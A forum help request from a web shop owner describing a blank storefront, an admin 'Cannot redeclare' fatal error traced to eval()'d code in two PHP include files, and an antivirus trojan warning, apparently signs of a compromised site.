help needed blank page + fatal error

hi everyone, i'v searched the forum but still cant find any solutions for it. about aweek ago i got this fatal error on my admins page and the main page is also blank , i tried to get to the admin page by replacing the functions_email.php with the default one but iv got no idea how to fix the database_table .

here is the error when you go to your admin page :

Fatal error: Cannot redeclare n0a() (previously declared in /home/xxxx/public_html/shop/includes/database_tables.php(1) : eval()'d code:1) in /home/xxxxx/public_html/shop/includes/functions/functions_email.php(1) : eval()'d code on line 1

i would really appreciate your idea's and help

the error is on most php files

but now when i try to login from admin page i get trojan warn from my antivirus.
